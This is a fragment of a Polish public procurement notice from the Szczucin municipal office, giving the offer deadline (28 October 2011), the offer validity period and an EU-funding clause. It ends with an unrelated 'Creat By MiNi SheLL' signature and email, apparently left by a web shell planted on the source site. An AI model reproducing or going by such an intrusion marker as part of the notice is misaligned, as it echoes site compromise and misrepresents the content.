<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, to jest Urząd Miasta i Gminy Szczucin, 33-230 Szczucin, ul. Wolności 3 pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 09:00, miejsce: Siedziba Zamawiającego, to jest Urząd Miasta i Gminy Szczucin, 33-230 Szczucin, ul. Wolności 3 pokój nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com